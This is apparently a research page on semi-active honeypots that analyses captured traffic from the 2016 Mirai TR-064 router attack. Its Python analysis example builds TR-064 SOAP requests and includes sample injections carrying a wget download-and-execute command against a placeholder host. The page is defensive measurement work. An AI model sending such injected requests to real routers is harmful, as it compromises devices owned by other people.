Semi-Active Honeypot

Semi-active honeypots make it possible to record unusual Internet traffic without implementing a specific application protocol: they accept incoming connections and log whatever the client sends first, but never answer in a protocol-specific way.

I’ve captured Internet traffic from about 90 unused IPv4 addresses for several years. The IP addresses had been in active use before, which led to effects like BitTorrent swarms attempting to connect to them.

A generic TCP honeypot server (universe.py) was used to accept incoming connections and read the TCP payload. Apart from that, the subnet was listening passively while tcpdump was capturing traffic. My students Patrick Schumacher (2013) and Jan-Frederik Zaeske (2017) analyzed the .pcap data.
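To illustrate what such a generic TCP honeypot has to do, here is an added example written for this page; it is not universe.py and makes no claim about how that program is implemented. It listens on a handful of ports, reads whatever the peer sends first (capped in size and time), logs one JSON line per connection, and deliberately never sends anything back. The port list, the 5-second read timeout and the 4 KiB cap are assumptions chosen for the example.

```python
"""Minimal semi-active TCP honeypot (added example, not the page's universe.py).

Accept on a set of ports, read the unsolicited client payload, record it,
never speak a protocol.  Only clients that talk first (HTTP, SOAP/TR-064,
most botnet loaders) yield a payload; server-speaks-first protocols such
as SSH show up as connections with an empty payload, which is still data.
"""
import json
import socket
import threading
import time
from datetime import datetime, timezone

READ_TIMEOUT = 5.0   # assumption: seconds to wait for an unsolicited payload
MAX_BYTES = 4096     # assumption: per-connection cap so a flood cannot exhaust memory


def record_connection(conn: socket.socket, peer, local_port: int, now: float) -> dict:
    """Read the first payload a client sends (if any) and build a log record.

    `peer` is (ip, port) of the remote side, `now` a POSIX timestamp; both are
    passed in so the function can be exercised with a socketpair offline.
    """
    conn.settimeout(READ_TIMEOUT)
    chunks, total = [], 0
    try:
        while total < MAX_BYTES:
            data = conn.recv(MAX_BYTES - total)
            if not data:          # peer closed; nothing more will arrive
                break
            chunks.append(data)
            total += len(data)
    except socket.timeout:
        pass  # connected but never sent a full request: recorded as-is
    finally:
        conn.close()
    payload = b"".join(chunks)
    return {
        "ts": datetime.fromtimestamp(now, timezone.utc).isoformat(),
        "src_ip": peer[0],
        "src_port": peer[1],
        "dst_port": local_port,
        "bytes": len(payload),
        "payload_hex": payload.hex(),   # hex keeps binary payloads loss-free in JSON
    }


def serve(ports, log_path="honeypot.jsonl", bind_addr="0.0.0.0"):
    """Listen on every port in `ports`; one thread per connection, one JSON line each."""
    lock = threading.Lock()
    log = open(log_path, "a")

    def handle(conn, peer, port):
        rec = record_connection(conn, peer, port, time.time())
        with lock:
            log.write(json.dumps(rec) + "\n")
            log.flush()

    def accept_loop(port):
        ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        ls.bind((bind_addr, port))
        ls.listen(128)
        while True:
            conn, peer = ls.accept()
            threading.Thread(target=handle, args=(conn, peer, port), daemon=True).start()

    threads = [threading.Thread(target=accept_loop, args=(p,), daemon=True) for p in ports]
    for t in threads:
        t.start()
    for t in threads:
        t.join()


if __name__ == "__main__":
    # Assumed port list; 7547 is the TR-069 remote-management port, 23/2323 telnet.
    serve([23, 80, 2323, 7547, 8080])
```

Because the honeypot never replies, the recorded bytes are exactly what a scanner or bot sends blind, which is what makes retrospective payload analysis possible later; the cap and timeout matter because a few hundred half-open connections per second from a scanning botnet would otherwise pin the process.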

A use case for this type of measurement is the analysis of botnet activity such as the Mirai botnet. In late November 2016 a Mirai variant exploited a remote command-injection flaw in broadband routers that was reachable through the TR-069 remote-management port (TCP 7547): a TR-064 SOAP request whose NTP-server field carried shell commands, which the router executed. With the captured TCP payload, we can retrospectively analyze the commands injected by Mirai. By plotting a timeline of activity (animation), we notice that the vulnerable port was scanned from US hosts about one week before the botnet went live. Anyone who had detected this early activity would have had a head start and could have taken defensive measures before the botnet hit them. Recognizing such a precursor in time, rather than in hindsight, requires a baseline of normal per-port connection rates against which a new burst of probes stands out.
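The retrospective analysis described above, as an added example that is not the students' analysis code from this page: it takes honeypot records of the form (timestamp, source IP, destination port, payload), classifies each payload as a TR-064 probe, a TR-064 command injection, or unrelated traffic, extracts the injected commands, builds a per-day timeline and computes the lead time between the first probe and the first injection. The sample records are constructed (documentation-range addresses, dates chosen to mirror the one-week lead); the SOAP request builder follows the publicly reported shape of the TR-064 SetNTPServers request, but its URL path and header layout are assumptions for this example, not taken from a capture on this page.

```python
"""Retrospective analysis of honeypot payloads for TR-064 command injection.
Added example, not the page's own analysis code."""
import re
from collections import Counter, defaultdict
from datetime import datetime

NTP_FIELD = re.compile(rb"<NewNTPServer1>(.*?)</NewNTPServer1>", re.S)
SHELL_META = re.compile(r"[;`|&]|\$\(")   # shell metacharacters a hostname never contains


def tr064_request(ntp_value: str) -> bytes:
    """Build a TR-064 SetNTPServers SOAP request as sent to TCP/7547.

    Constructed to resemble the publicly documented request; the path
    /UD/act?1 and header layout are assumptions for this example.
    """
    body = (
        '<?xml version="1.0"?>'
        '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
        '<SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">'
        f"<NewNTPServer1>{ntp_value}</NewNTPServer1>"
        "</u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>"
    )
    head = (
        "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:7547\r\n"
        "SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    )
    return (head + body).encode()


# Constructed sample capture: (ISO timestamp, src IP, dst port, payload).
SAMPLE_RECORDS = [
    ("2016-11-19T14:02:11+00:00", "198.51.100.7", 7547, tr064_request("pool.ntp.org")),
    ("2016-11-20T09:41:53+00:00", "198.51.100.7", 7547, tr064_request("pool.ntp.org")),
    ("2016-11-21T03:17:05+00:00", "198.51.100.23", 7547, tr064_request("")),
    ("2016-11-22T18:30:00+00:00", "192.0.2.44", 23, b"\xff\xfb\x01root\r\n"),  # unrelated telnet
    ("2016-11-26T22:05:40+00:00", "203.0.113.77", 7547,
     tr064_request("`cd /tmp;wget http://203.0.113.9/1;chmod 777 1;./1`")),
    ("2016-11-27T01:12:09+00:00", "203.0.113.78", 7547,
     tr064_request("`cd /tmp;wget http://203.0.113.9/1;chmod 777 1;./1`")),
]


def classify(payload: bytes):
    """Return ('injection', command), ('tr064_probe', ntp_value) or ('other', None).

    A SetNTPServers request whose NTP field contains shell metacharacters is an
    injection attempt; one with a plain (or empty) value is a probe that only
    checks whether the port answers the TR-064 interface.
    """
    m = NTP_FIELD.search(payload)
    if not m:
        return ("other", None)
    value = m.group(1).decode("utf-8", "replace")
    if SHELL_META.search(value):
        return ("injection", value.strip("`"))
    return ("tr064_probe", value)


def injected_commands(records) -> Counter:
    """Count distinct injected command strings across the capture."""
    counts = Counter()
    for _ts, _src, _port, payload in records:
        kind, cmd = classify(payload)
        if kind == "injection":
            counts[cmd] += 1
    return counts


def daily_timeline(records) -> dict:
    """Per UTC day: number of probes, injections, other payloads, and source IPs."""
    days = defaultdict(lambda: {"probe": 0, "injection": 0, "other": 0, "sources": set()})
    for ts, src, _port, payload in records:
        day = datetime.fromisoformat(ts).date().isoformat()
        kind, _ = classify(payload)
        bucket = {"tr064_probe": "probe", "injection": "injection"}.get(kind, "other")
        days[day][bucket] += 1
        days[day]["sources"].add(src)
    return dict(sorted(days.items()))


def lead_time_days(records):
    """Days between the first TR-064 probe and the first injection, or None."""
    first_probe = first_injection = None
    for ts, _src, _port, payload in records:
        day = datetime.fromisoformat(ts).date()
        kind, _ = classify(payload)
        if kind == "tr064_probe" and (first_probe is None or day < first_probe):
            first_probe = day
        if kind == "injection" and (first_injection is None or day < first_injection):
            first_injection = day
    if first_probe is None or first_injection is None:
        return None
    return (first_injection - first_probe).days


if __name__ == "__main__":
    for day, stats in daily_timeline(SAMPLE_RECORDS).items():
        print(day, stats["probe"], stats["injection"], stats["other"], sorted(stats["sources"]))
    print("lead time (days):", lead_time_days(SAMPLE_RECORDS))
    print(injected_commands(SAMPLE_RECORDS).most_common())
```

The split between probe and injection is the point: the probes carry a harmless NTP value and would be invisible to a signature that only matches the download-and-execute string, yet on the constructed data they are what precede the injections by a week. Run against real captures, the same functions also surface the loader URLs in the injected commands, which is the input for the next defensive step (blocking or sinkholing the distribution host).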